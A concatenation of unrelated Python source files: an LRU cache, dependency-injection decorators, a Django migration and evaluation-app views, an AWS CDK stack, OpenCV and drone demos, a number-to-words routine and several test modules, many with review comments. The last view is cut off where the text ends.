        """Insert ``key -> value``, evicting the least recently used entry
        when the cache is full."""
        # BUG FIX: re-adding an existing key used to create a second node,
        # leaving a stale duplicate in the recency list and inflating
        # ``size``; refresh the existing node in place instead.
        if key in self._cache_by_key:
            node = self._cache_by_key[key]
            node.value = value
            self._cache_by_use.move_to_front(node)
            return
        if self._cache_by_use.size >= self._max_size:
            removed = self._cache_by_use.remove_back()
            del self._cache_by_key[removed.key]
        node = self._cache_by_use.add_to_front(key, value)
        self._cache_by_key[key] = node
class _LRUCacheList:
    """Doubly linked list ordered by recency; front = most recently used."""
    def __init__(self):
        # Front of the list: most recently used
        self.front = None
        self.back = None
        self.size = 0
    def add_to_front(self, key, value):
        """Create a node for (key, value), link it at the front, return it."""
        node = _LRUCacheNode(key, value)
        self._add_to_front(node)
        self.size += 1
        return node
    def _add_to_front(self, node):
        # Links an (unlinked) node at the front; does not touch self.size.
        if self.size == 0:
            self.front = node
            self.back = node
        else:
            node.next = self.front
            self.front.prev = node
            self.front = node
    def move_to_front(self, node):
        """Unlink ``node`` from its current position and relink it at the
        front.  ``node`` must currently be a member of this list."""
        if self.front == node:
            # Nothing needs to be done if the node is already at the front of
            # the list
            return
        if node.next is None:
            # Back of the list
            node.prev.next = None
            self.back = node.prev
            node.prev = None
        else:
            # Middle of the list
            node.prev.next = node.next
            node.next.prev = node.prev
            node.next = None
            node.prev = None
        self._add_to_front(node)
    def remove_back(self):
        """Unlink and return the least recently used node, or None if empty."""
        if self.size == 0:
            return None
        node = self.back
        if self.size == 1:
            self.front = None
            self.back = None
        else:
            node.prev.next = None
            self.back = node.prev
        self.size -= 1
        return node
class _LRUCacheNode:
def __init__(self, key, value):
self.key = key
self.value = value
self.prev = None
self.next = None
|
import pytest
import simple_skidl_parts.analog.vdiv as vdiv
from skidl import *
def test_vdiv1():
    """Smoke test: build a 3:1 voltage divider and emit a netlist.

    NOTE(review): requires the skidl toolchain; writes to the fixed path
    /tmp/lala.net and leaves the file handle unclosed.
    """
    gnd, vin, vout = Net("GND"), Net("Vin"), Net("OUT")
    v = vdiv.vdiv(vin, vout, gnd, ratio=3.0)
    generate_netlist(file_=open("/tmp/lala.net", "w"))
|
# Copyright 2022 neomadas-dev
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
# PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
# TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from inspect import isclass, isfunction
from typing import get_type_hints
def AutoWire(cls):
    """Class decorator: replaces ``cls.__new__`` so every annotated class
    attribute is populated from ``manager.pairs`` before __init__ runs.

    NOTE(review): the wrapper calls self.__init__ itself, and Python's
    type.__call__ calls __init__ again afterwards, so __init__ runs twice
    per construction -- confirm this is intended.
    """
    def new_decoration(new_method, type_hints):
        def wrapper(cls, *args, **kwargs):
            self = new_method(cls)
            # Instantiate the registered concrete for every annotation.
            for name, key in type_hints.items():
                call = manager.pairs[key]
                setattr(self, name, call())
            self.__init__(*args, **kwargs)
            return self
        return wrapper
    type_hints = get_type_hints(cls)
    cls.__new__ = new_decoration(cls.__new__, type_hints)
    return cls
class Manager:
    """Registry mapping interface keys to concrete factories."""
    def __init__(self):
        # interface -> zero-argument factory producing the concrete object.
        self.pairs = {}

    def wire(self, interface, concrete):
        """Register ``concrete`` as the factory for ``interface``."""
        self.pairs[interface] = concrete
# Module-level singleton registry used by all the decorators in this module.
manager = Manager()
# new api
def wire(f):
    """Decorator: injects registered dependencies into every parameter of
    ``f`` annotated with a Provide marker (i.e. ``Wired[X]``)."""
    hints = get_type_hints(f)

    def wrapper(*args, **kwargs):
        # Resolve each Provide-annotated parameter through the registry.
        for param, annotation in hints.items():
            if isinstance(annotation, Provide):
                kwargs[param] = manager.pairs[annotation.it]()
        return f(*args, **kwargs)
    return wrapper
def Wireable(tg):
    """Class decorator like AutoWire, but only injects attributes whose
    annotation is a Provide marker (declared via ``Wired[X]``).

    NOTE(review): as with AutoWire, __init__ ends up invoked twice (once
    by the wrapper, once by type.__call__) -- confirm intended.
    """
    def new_decoration(new_method, type_hints):
        def wrapper(tg, *args, **kwargs):
            self = new_method(tg)
            for name, key in type_hints.items():
                if isinstance(key, Provide):
                    call = manager.pairs[key.it]
                    setattr(self, name, call())
            self.__init__(*args, **kwargs)
            return self
        return wrapper
    type_hints = get_type_hints(tg)
    tg.__new__ = new_decoration(tg.__new__, type_hints)
    return tg
class Provide:
    """Annotation marker wrapping the interface key to be injected."""
    __slots__ = ('it',)

    def __init__(self, it):
        # The registry key looked up in manager.pairs at injection time.
        self.it = it
class Provider:
    """Special-form-like named singleton (modeled on typing._SpecialForm)
    used as an annotation namespace: ``SomeProvider[X]`` yields Provide(X).

    Instances cannot be called, subclassed, or meaningfully copied, and
    reject isinstance()/issubclass() checks.
    """
    __slots__ = ('_name', '_doc', '__weakref__')

    def __init__(self, name, doc):
        self._name = name
        self._doc = doc

    def __new__(cls, *args, **_):
        # Reject the (name, bases, namespace) signature of class creation,
        # i.e. attempts to use an instance as a metaclass-style base.
        if (len(args) == 3 and
                isinstance(args[0], str) and
                isinstance(args[1], tuple)):
            raise TypeError(f"Cannot subclass {cls!r}")
        return super().__new__(cls)

    def __init_subclass__(self, /, *_, **ks):
        # Internal subclasses must opt in with the _root class keyword.
        if '_root' not in ks:
            raise TypeError('Cannot subclass provider classes')

    def __copy__(self):
        # Singleton semantics: copies are the object itself.
        return self

    def __deepcopy__(self, _):
        return self

    def __eq__(self, other):
        # BUG FIX: the original tested isinstance(other, _SpecialForm), a
        # name that does not exist in this module (code copied from
        # typing), so every comparison raised NameError.  Compare against
        # Provider instead; names identify instances.
        if not isinstance(other, Provider):
            return NotImplemented
        return self._name == other._name

    def __hash__(self):
        return hash((self._name,))

    def __repr__(self):
        return 'ioc.' + self._name

    def __reduce__(self):
        # Pickle by global name, like typing's special forms.
        return self._name

    def __call__(self, *_, **__):
        raise TypeError(f'Cannot instantiate {self!r}')

    def __instancecheck__(self, _):
        raise TypeError(f'{self} cannot be used with isinstance()')

    def __subclasscheck__(self, _):
        raise TypeError(f'{self} cannot be used with issubclass()')

    def __getitem__(self, provider):
        # ``Wired[Member]`` -> Provide(Member), consumed by @wire/@Wireable.
        return Provide(provider)
Wired = Provider('Wired', doc=
"""Declare a dependency wireable class.
@Wireable
class Service:
member: Wired[Member]
@wire
def process(argument, another: Wired[Another]):
return None
@wire
def process(argument, extra: Wired[Extra]):
return None
""")
|
import argparse
# Apply the edits of a single annotator to generate the corrected sentences.
def main(args):
    """Write the original (uncorrected) sentence of every M2 entry, one
    per line, to args.out.

    NOTE(review): despite the file's header comment, no edits are applied
    yet -- the ``skip`` set is declared for that purpose but unused.
    """
    # BUG FIX: both files were opened without ever being closed; use
    # context managers so output is flushed deterministically.
    with open(args.m2_file) as m2_file:
        m2 = m2_file.read().strip().split("\n\n")
    # Do not apply edits with these error types
    skip = {"noop", "UNK", "Um"}
    with open(args.out, "w") as out:
        for sent in m2:
            sent = sent.split("\n")
            orig_sent = sent[0].split()[1:]  # Ignore "S "
            out.write(" ".join(orig_sent)+"\n")
if __name__ == "__main__":
    # Define and parse program input
    parser = argparse.ArgumentParser()
    parser.add_argument("m2_file", help="The path to an input m2 file.")
    parser.add_argument("-out", help="A path to where we save the output corrected text file.", required=True)
    # NOTE(review): -id is accepted but not currently used by main().
    parser.add_argument("-id", help="The id of the target annotator in the m2 file.", type=int, default=0)
    args = parser.parse_args()
    main(args)
|
"""
Short demo of drone functionality. For the full list of available commands
check:
https://djitellopy.readthedocs.io/en/latest/tello/
"""
from tello import Drone
# The Drone context manager handles connection setup and teardown.
with Drone() as d:
    d.start_video('video.avi')  # record the flight to a local file
    d.takeoff()
    # Units per djitellopy conventions (cm / degrees / seconds) -- TODO confirm.
    d.move_forward(50)
    d.rotate_clockwise(360)
    d.wait(5.0)
    d.land()
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.16 on 2018-10-10 21:13
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial migration: disk, Early_warn, softver and tomcatver tables.

    The ``verbose_name`` values are \\u-escaped Chinese admin labels; kept
    byte-for-byte as generated.
    """
    initial = True
    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='disk',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=256, verbose_name='\u4e3b\u673a')),
                ('mark', models.CharField(max_length=80, verbose_name='\u7a7a\u95f4')),
                ('create_date', models.DateTimeField(auto_now_add=True)),
            ],
            options={
                'verbose_name': '\u78c1\u76d8\u7a7a\u95f4',
                'verbose_name_plural': '\u78c1\u76d8\u7a7a\u95f4',
            },
        ),
        migrations.CreateModel(
            name='Early_warn',
            fields=[
                ('id', models.AutoField(primary_key=True, serialize=False)),
                ('ipaddress', models.GenericIPAddressField(blank=True, null=True, verbose_name='IP\u5730\u5740')),
                ('mark', models.CharField(max_length=30, verbose_name='\u6545\u969c\u6807\u8bc6')),
                ('report_msm', models.TextField(verbose_name='\u6c47\u62a5\u4fe1\u606f')),
                ('report_date', models.DateTimeField(auto_now_add=True)),
            ],
            options={
                'verbose_name': '\u5f02\u5e38\u6293\u53d6\u63a8\u9001',
                'verbose_name_plural': '\u5f02\u5e38\u6293\u53d6\u63a8\u9001',
            },
        ),
        migrations.CreateModel(
            name='softver',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=256, verbose_name='\u4e3b\u673a')),
                ('Kernel', models.CharField(max_length=80, verbose_name='\u5185\u6838')),
                ('nginx', models.CharField(max_length=80, verbose_name='nginx')),
                ('create_date', models.DateTimeField(auto_now_add=True)),
            ],
            options={
                'verbose_name': '\u8f6f\u4ef6\u7248\u672c',
                'verbose_name_plural': '\u8f6f\u4ef6\u7248\u672c',
            },
        ),
        migrations.CreateModel(
            name='tomcatver',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=256, verbose_name='\u4e3b\u673a')),
                ('tomcat', models.CharField(max_length=80, verbose_name='\u7248\u672c')),
                ('create_date', models.DateTimeField(auto_now_add=True)),
            ],
            options={
                'verbose_name': 'tomcat\u7248\u672c',
                'verbose_name_plural': 'tomcat\u7248\u672c',
            },
        ),
    ]
|
import os
from aws_cdk import (
core,
aws_lambda,
aws_lambda_event_sources as sources,
aws_iam as iam,
aws_s3 as s3,
aws_sns as sns,
aws_dynamodb as dynamo,
aws_events as events,
aws_events_targets as event_targets,
)
class JobSummaryStack(core.Stack):
    """CDK stack: a Lambda that summarizes EMR-launch Step Function runs,
    triggered by an EventBridge rule on terminal execution states."""
    def __init__(self,
                 scope: core.Construct,
                 id: str,
                 orchestration_sfn_name: str,
                 launch_sfn_name: str,
                 log_bucket_arn: str,
                 destination_bucket_name: str,
                 success_sns_topic_arn: str,
                 failure_sns_topic_arn: str,
                 **kwargs
                 ):
        super().__init__(scope, id, **kwargs)
        # Account/region come from the CDK environment at synth time.
        aws_account = os.environ["CDK_DEFAULT_ACCOUNT"]
        aws_region = os.environ["CDK_DEFAULT_REGION"]
        lambda_code = aws_lambda.Code.from_asset("infrastructure/job_summary/lambda_source/")
        job_summary_lambda = aws_lambda.Function(self, "EmrLaunchJobSummaryLambda",
            code=lambda_code,
            handler="main.lambda_handler",
            runtime=aws_lambda.Runtime.PYTHON_3_7,
            timeout=core.Duration.minutes(1),
            environment={
                "DESTINATION_BUCKET_NAME": destination_bucket_name,
                "SUCCESS_SNS_TOPIC_ARN": success_sns_topic_arn,
                "FAILURE_SNS_TOPIC_ARN": failure_sns_topic_arn
            },
            # Least-privilege statements: read SFN execution details, read
            # EMR cluster/step info, read/write the log bucket, publish to
            # the two notification topics.
            initial_policy=[
                iam.PolicyStatement(
                    effect=iam.Effect.ALLOW,
                    actions=[
                        "states:DescribeExecution",
                        "states:GetExecutionHistory",
                    ],
                    resources=[
                        f"arn:aws:states:{aws_region}:{aws_account}:execution:{orchestration_sfn_name}:*",
                        f"arn:aws:states:{aws_region}:{aws_account}:execution:{launch_sfn_name}:*",
                    ]
                ),
                iam.PolicyStatement(
                    effect=iam.Effect.ALLOW,
                    actions=[
                        "elasticmapreduce:DescribeCluster",
                        "elasticmapreduce:ListSteps",
                    ],
                    resources=[
                        f"arn:aws:elasticmapreduce:{aws_region}:{aws_account}:cluster/*",
                    ]
                ),
                iam.PolicyStatement(
                    effect=iam.Effect.ALLOW,
                    actions=[
                        "s3:ListBucket",
                        "s3:GetObject",
                        "s3:PutObject",
                    ],
                    resources=[
                        log_bucket_arn,
                        f"{log_bucket_arn}/*",
                    ]
                ),
                iam.PolicyStatement(
                    effect=iam.Effect.ALLOW,
                    actions=[
                        "SNS:Publish",
                    ],
                    resources=[
                        success_sns_topic_arn,
                        failure_sns_topic_arn,
                    ]
                )
            ],
        )
        # Fire on any terminal status of the orchestration state machine.
        job_summary_event_rule = events.Rule(self, "EmrLaunchJobSummaryEventRule",
            description="Triggers the creation of SFN execution summary",
            event_pattern=events.EventPattern(
                source=["aws.states"],
                detail_type=["Step Functions Execution Status Change"],
                detail={
                    "status": [
                        "SUCCEEDED",
                        "FAILED",
                        "TIMED_OUT",
                        "ABORTED"
                    ],
                    "stateMachineArn": [
                        f"arn:aws:states:{aws_region}:{aws_account}:stateMachine:{orchestration_sfn_name}",
                    ]
                }
            )
        )
        # The Lambda only receives the execution ARN, not the full event.
        job_summary_event_rule.add_target(event_targets.LambdaFunction(job_summary_lambda,
            event=events.RuleTargetInput.from_object({
                "sfnExecutionArn": events.EventField.from_path("$.detail.executionArn")
            })
        ))
|
# USAGE
# python simple_thresholding.py --image ../images/coins.png
# Import the necessary packages
import numpy as np
import argparse
import cv2
# Construct the argument parser and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-i", "--image", required = True,
    help = "Path to the image")
args = vars(ap.parse_args())
# Load the image, convert it to grayscale, and blur it slightly
image = cv2.imread(args["image"])
image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
blurred = cv2.GaussianBlur(image, (5, 5), 0)
cv2.imshow("Image", image)
# Apply basic inverse thresholding: pixels greater than the threshold
# (here 155) become black (0) and the rest become white (255), so the
# darker coins come out white against a black background.
(T, threshInv) = cv2.threshold(blurred, 155, 255, cv2.THRESH_BINARY_INV)
cv2.imshow("Threshold Binary Inverse", threshInv)
# Using plain THRESH_BINARY as the last argument inverts that mapping,
# making the coins black rather than white.
(T, thresh) = cv2.threshold(blurred, 155, 255, cv2.THRESH_BINARY)
cv2.imshow("Threshold Binary", thresh)
# Finally, use the inverted threshold as a mask to visualize only
# the coins in the image
cv2.imshow("Coins", cv2.bitwise_and(image, image, mask = threshInv))
cv2.waitKey(0)
from gencon_miner import GenconMiner, __version__
def test_version():
    """Pin the published package version string."""
    assert __version__ == '0.1.6'
def test_url_extract():
    """Extract <title> directly from a URL.

    NOTE(review): depends on live network access and google.com's markup.
    """
    miner = GenconMiner(url='http://google.com')
    data = miner.extract('title')
    assert data[-1].text == 'Google'
def test_text_extract():
    """Extract <title> from pre-fetched HTML text.

    NOTE(review): still network-dependent (fetches google.com first).
    """
    import requests
    html_data = requests.get('http://google.com')
    miner = GenconMiner(text=html_data.text)
    data = miner.extract('title')
    assert data[-1].text == 'Google'
def test_on_target_extract():
    """Extract a child selector ('title') within a parent ('html').

    NOTE(review): network-dependent.
    """
    miner = GenconMiner(url='http://google.com')
    data = miner.extract('html', 'title')
    assert data[-1].text == 'Google'
def test_on_get_all_text():
    """to_text() on a JSON endpoint should round-trip through json.loads.

    NOTE(review): network-dependent (jsonplaceholder.typicode.com).
    """
    import json
    miner = GenconMiner(url='http://jsonplaceholder.typicode.com/todos/1')
    data = miner.to_text()
    test_json = {"userId": 1,
                 "id": 1,
                 "title": "delectus aut autem",
                 "completed": False}
    assert json.loads(data) == test_json
def test_on_get_soup():
    """to_soup() should return a BeautifulSoup instance.

    NOTE(review): network-dependent.
    """
    from bs4 import BeautifulSoup
    miner = GenconMiner(url='http://google.com')
    assert isinstance(miner.to_soup(), BeautifulSoup)
|
#pj17
# Word tables for spelling out integers ('zero' and 'hundred' are handled
# inline by the conversion functions below).
ones = ('one', 'two', 'three', 'four', 'five', 'six', 'seven', 'eight', 'nine')
teens = ('ten', 'eleven', 'twelve', 'thirteen', 'fourteen', 'fifteen', 'sixteen', 'seventeen', 'eighteen', 'nineteen')
tenties = ('twenty', 'thirty', 'forty', 'fifty', 'sixty', 'seventy', 'eighty', 'ninety')
# Names for powers of ten, keyed by decimal exponent.
ten_to_str = {3:'thousand', 6:'million', 9:'billion'}
def int_to_str(num):
    """takes num e.g. 123 and outputs 'one hundred and twenty three'"""
    # Decompose into [digit, power-of-ten] pairs.
    b = strip(num)
    c = []
    length = len(b)
    count = length-1
    temp = 0
    # Group the digit pairs into threes, working from the least
    # significant end so incomplete groups land at the front.
    while count >= 0:
        if temp == 3:
            temp = 0
        if temp == 0:
            c.append([])
        c[-1].append(b[count])
        temp += 1
        count -= 1
    c.reverse()
    for thing in c:
        thing.reverse()
    numString = ''
    for thing in c:
        # Power of the group's least significant digit: 0, 3, 6 or 9,
        # which indexes ten_to_str for 'thousand'/'million'/'billion'.
        power = thing[-1][-1]
        num = int(''.join([str(pair[0]) for pair in thing]))
        powerString = ' ' + ten_to_str[power] + ' ' if power != 0 else ''
        # British-style "and" before a final group under one hundred.
        if power == 0 and num < 100 and num != 0:
            numString += 'and '
        numString += int_to_num_below_100(num) + powerString
    return(numString)
def strip(num):
    """ takes num e.g. 456 and outputs [[4, 2], [5, 1], [6, 0]]"""
    digits = str(num)
    top = len(digits) - 1
    # Pair each digit with its power of ten, most significant first.
    return [[int(ch), top - i] for i, ch in enumerate(digits)]
def int_to_num_below_100(num):
    """Spell out a group of up to three digits (hundreds, tens, ones).

    NOTE(review): despite the name this handles values up to 999, and
    ``zeroLatch`` is never set True, so the 'zero' branch is dead code --
    confirm before relying on output for 0.
    """
    b = strip(num)
    comp = ''
    count = 0
    length = len(b)
    #True if there was stuff before - then next thing will add ' '
    stuffLatch = False
    #True if there is hundreds to deal with - then if stuff in tens or ones will add 'and'
    andLatch = False
    #True if there is teens to deal with - then ones ignored
    teenLatch = False
    #True if no hundreds or tens - then zero can be put in
    zeroLatch = False
    twoLatch = False
    if length == 3:
        #If the hundred's isn't 0, so it is actually a number ish.
        if b[count][0] != 0:
            #some number of hundreds
            comp += ones[b[count][0]-1] + ' ' + 'hundred'
            #There will need to be an and
            stuffLatch = True
            andLatch = True
        count += 1
        stuffLatch = True
    if length >= 2:
        temp = len(comp)
        #If there's stuff in 2, and stuff in 3, add ' and'
        if b[count][0] != 0:
            twoLatch = True
            if andLatch:
                comp += ' and '
                andLatch = False
        else:
            #So that step 3 (1) knows that stuff's happened
            stuffLatch = True
        if b[count][0] == 1:
            #So that step 3 (1) knows not to do anything
            teenLatch = True
            comp += teens[b[count+1][0]]
        elif b[count][0] != 0:
            #If not teen and not 0, add on twenty/thirty/...
            comp += tenties[b[count][0]-2]
        count += 1
    if length >= 1:
        if b[count][0] != 0:
            #If and needs to be said, say ' and'
            if andLatch:
                comp += ' and '
        if zeroLatch:
            #aka if the one digit is zero and there's been nothing before, add zero
            comp += 'zero'
        if not teenLatch and b[count][0] != 0:
            if twoLatch:
                # Hyphenate e.g. 'twenty-three'.
                comp += '-'
            #if wasn't a teen and stuff
            comp += ones[b[count][0]-1]
    return(comp)
def letter_length(end, start=1):
    """calculates number of letters from start to end inclusive"""
    total = 0
    for value in range(start, end + 1):
        # Spaces and hyphens are not letters, so skip them.
        total += sum(1 for ch in int_to_str(value) if ch not in ' -')
    return total
|
# coding: utf-8
# Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
from __future__ import unicode_literals
from six.moves import xrange as range
from nbdime import patch
from nbdime.diff_format import is_valid_diff
from nbdime.diffing.lcs import diff_from_lcs
from nbdime.diffing.seq_bruteforce import (bruteforce_compare_grid, bruteforce_llcs_grid,
bruteforce_lcs_indices, diff_sequence_bruteforce)
def test_diff_sequence_bruteforce():
    """Exercise the brute-force LCS machinery end to end on a set of
    small sequence pairs, checking grid invariants, LCS indices, and
    that the resulting diffs patch a into b."""
    examples = [
        ([], []),
        ([1], [1]),
        ([1, 2], [1, 2]),
        ([2, 1], [1, 2]),
        ([1, 2, 3], [1, 2]),
        ([2, 1, 3], [1, 2]),
        ([1, 2], [1, 2, 3]),
        ([2, 1], [1, 2, 3]),
        ([1, 2], [1, 2, 1, 2]),
        ([1, 2, 1, 2], [1, 2]),
        ([1, 2, 3, 4, 1, 2], [3, 4, 2, 3]),
        (list("abcab"), list("ayb")),
        (list("xaxcxabc"), list("abcy")),
    ]
    for a, b in examples:
        # Comparison grid: G[i][j] is truthy iff a[i] == b[j].
        G = bruteforce_compare_grid(a, b)
        assert all(bool(G[i][j]) == (a[i] == b[j]) for i in range(len(a)) for j in range(len(b)))
        # Length-of-LCS grid must be monotone and grow by at most 1.
        R = bruteforce_llcs_grid(G)
        for i in range(len(a)):
            for j in range(len(b)):
                assert R[i+1][j+1] >= R[i][j]
                assert R[i+1][j] >= R[i][j]
                assert R[i][j+1] >= R[i][j]
                assert R[i+1][j+1] - R[i][j] <= 1
                assert R[i+1][j] - R[i][j] <= 1
                assert R[i][j+1] - R[i][j] <= 1
        llcs = R[len(a)][len(b)]
        # The recovered index lists must realize an LCS of that length.
        A_indices, B_indices = bruteforce_lcs_indices(a, b, G, R)
        assert len(A_indices) == len(B_indices)
        assert len(A_indices) == llcs
        assert all(a[A_indices[r]] == b[B_indices[r]] for r in range(llcs))
        # A diff built from the LCS must be valid and transform a into b.
        d = diff_from_lcs(a, b, A_indices, B_indices)
        assert is_valid_diff(d)
        assert patch(a, d) == b
        # Test combined function (repeats the above pieces)
        assert patch(a, diff_sequence_bruteforce(a, b)) == b
|
from django.http import HttpResponse
from django.http import HttpResponseRedirect
from django.shortcuts import render, redirect, get_object_or_404
from django.contrib import auth
from django.template.context_processors import csrf
from django.contrib.auth import login, logout, authenticate
from django.contrib.auth.forms import UserCreationForm, AuthenticationForm
from django.contrib import messages
from .models import Lecturer, Unit, SectionOne, SectionTwo, SectionThree, SectionFour, SectionFive, Lecturer_Evaluated, RegisteredUnit
from django.contrib.auth.models import User
# from django.models import Student
# Create your views here.
def home_view(request, *args, **kwargs):
    """Render the landing page."""
    context = {}
    return render(request, "home.html", context)
def evaluate_view(request, *args, **kwargs):
    """Section-I evaluation page; anonymous users see the login page."""
    if not request.user.is_authenticated:
        return render(request, "login.html")
    registered = RegisteredUnit.objects.all().order_by(
        'id', 'lecturer', 'lecturer_id', 'student', 'student_id', 'unit', 'unit_id')
    return render(request, "evaluate.html", context={"registered_units": registered})
def evaluate_section_ii_view(request, *args, **kwargs):
    """Section-II evaluation page; anonymous users see the login page."""
    if not request.user.is_authenticated:
        return render(request, "login.html")
    return render(request, "evaluate-section-ii.html", {})
def evaluate_section_iii_view(request, *args, **kwargs):
    """Section-III evaluation page; anonymous users see the login page."""
    if not request.user.is_authenticated:
        return render(request, "login.html")
    return render(request, "evaluate-section-iii.html", {})
def evaluate_section_iv_view(request, *args, **kwargs):
    """Section-IV evaluation page.

    CONSISTENCY FIX: the other evaluate-section views require login but
    this one rendered for anonymous users too; add the same guard.
    """
    if request.user.is_authenticated:
        return render(request, "evaluate-section-iv.html", {})
    return render(request, "login.html")
def student_login_view(request, *args, **kwargs):
    """Render the login form with a CSRF token in the context."""
    context = {}
    context.update(csrf(request))
    return render(request, "login.html", context)
def auth_view(request, *args, **kwargs):
    """Authenticate a student from the posted login form.

    On success, logs the user in and redirects to the evaluation page; on
    any failure (invalid form or bad credentials) flashes the same error
    and redirects back to the login page.  Non-POST requests render the
    login page.
    """
    if request.method == "POST":
        form = AuthenticationForm(request, data=request.POST)
        if form.is_valid():
            username = form.cleaned_data.get('username')
            password = form.cleaned_data.get('password')
            user = authenticate(username=username, password=password)
            if user is not None:
                login(request, user)
                messages.info(request, "Logged in successfully!")
                return redirect('../evaluate', {})
        # Invalid form and bad credentials shared identical branches;
        # merged.  (Also dropped f-prefixes with no placeholders and the
        # dead `form = AuthenticationForm()` after the if.)
        messages.error(request, "Invalid Registration number or Password!")
        return redirect('../login')
    return render(request, "login.html")
def section_one(request, *args, **kwargs):
    """Persist the Section-I answers for the selected lecturer/unit and
    render Section II.  Non-POST requests are redirected back."""
    if request.method == "POST":
        # The posted 'unit' value packs "unit_id#lecturer_id#lecturer name".
        unit_id_r = request.POST.get('unit')
        unit_id_r = unit_id_r.split('#')
        unit_id = int(unit_id_r[0])
        lecturer_id = int(unit_id_r[1])
        lecturer = str(unit_id_r[2])
        q1 = request.POST.get('section-1-a')
        q2 = request.POST.get('section-1-b')
        q3 = request.POST.get('section-1-c')
        # Renamed from `login`, which shadowed the imported
        # django.contrib.auth.login function.
        user_id = request.user.id
        user = User.objects.get(id=user_id)
        unit = Unit.objects.get(id=unit_id)
        lec = Lecturer.objects.get(id=lecturer_id)
        # Record that this student evaluated this lecturer for this unit.
        section1a = Lecturer_Evaluated(name=lecturer, unit_id=unit, student_id=user)
        section1a.save()
        section1 = SectionOne(student=user, lecturer=lec, unit=unit, q1=q1, q2=q2, q3=q3)
        section1.save()
        return render(request, "evaluate-section-ii.html", context={"lecturer_id": lecturer_id, "unit_id": unit_id})
    else:
        return redirect('../../evaluate/')
def section_two(request, *args, **kwargs):
    """Persist the twelve Section-II answers for the given lecturer/unit
    and render Section III.  Non-POST requests are redirected back."""
    if request.method == "POST":
        lecturer_id = request.POST.get('lecturer_id')
        unit_id = request.POST.get('unit_id')
        # Answers section-2-a .. section-2-l map to q1 .. q12.
        q1 = request.POST.get('section-2-a')
        q2 = request.POST.get('section-2-b')
        q3 = request.POST.get('section-2-c')
        q4 = request.POST.get('section-2-d')
        q5 = request.POST.get('section-2-e')
        q6 = request.POST.get('section-2-f')
        q7 = request.POST.get('section-2-g')
        q8 = request.POST.get('section-2-h')
        q9 = request.POST.get('section-2-i')
        q10 = request.POST.get('section-2-j')
        q11 = request.POST.get('section-2-k')
        q12 = request.POST.get('section-2-l')
        # Renamed from `login`, which shadowed django.contrib.auth.login.
        user_id = request.user.id
        user = User.objects.get(id=user_id)
        unit = Unit.objects.get(id=unit_id)
        lec = Lecturer.objects.get(id=lecturer_id)
        section2 = SectionTwo(student=user, lecturer=lec, unit=unit, q1=q1, q2=q2, q3=q3, q4=q4, q5=q5, q6=q6, q7=q7, q8=q8, q9=q9, q10=q10, q11=q11, q12=q12)
        section2.save()
        return render(request, "evaluate-section-iii.html", {})
    else:
        return redirect('../../evaluate/2')
def section_three(request, *args, **kwargs):
    """Persist the seven section-three answers and advance to section four.

    Non-POST requests are redirected back to the section-three form.
    """
    if request.method != "POST":
        return redirect('../../evaluate/3')
    # Form fields section-3-a .. section-3-g map to model fields q1 .. q7.
    answers = {'q%d' % (index + 1): request.POST.get('section-3-%s' % letter)
               for index, letter in enumerate('abcdefg')}
    user = User.objects.get(id=request.user.id)
    SectionThree(student=user, **answers).save()
    return render(request, "evaluate-section-iv.html", {})
def section_four(request, *args, **kwargs):
    """Persist the section-four service ratings plus the free-form comment.

    One SectionFour row is saved per rated service (lecturer, ICT,
    examination office, library) and the improvement comment goes into
    SectionFive. Non-POST requests are redirected back to the form.
    """
    if request.method != "POST":
        return redirect('../../evaluate/4')
    post = request.POST
    user = User.objects.get(id=request.user.id)
    # (POST item field, comment-field prefix) per service, in save order.
    service_fields = [
        ('Lecturer', 'lecturer-comment'),
        ('ICT', 'ict-comment'),
        ('Examination-Office', 'exam-comment'),
        ('Library', 'library-comment'),
    ]
    for item_field, prefix in service_fields:
        SectionFour(student=user,
                    item=post.get(item_field),
                    q1=post.get(prefix + '-a'),
                    q2=post.get(prefix + '-b')).save()
    SectionFive(student=user, improvement=post.get('comment'),).save()
    return render(request, "home.html", {})
def loggedin(request, *args, **kwargs):
    """Render the evaluation landing page for the authenticated student.

    NOTE(review): the template key is 'full_name' but the value is the
    user's registration number (`regno`) — confirm this is intentional.
    """
    return render(request, "evaluate.html", {'full_name': request.user.regno})
def invalid_login(request, *args, **kwargs):
    """Re-render the login page after a failed authentication attempt."""
    return render(request, "login.html", {})
def logout_view(request, *args, **kwargs):
    """Log the current user out, flash a confirmation, and go home."""
    logout(request)
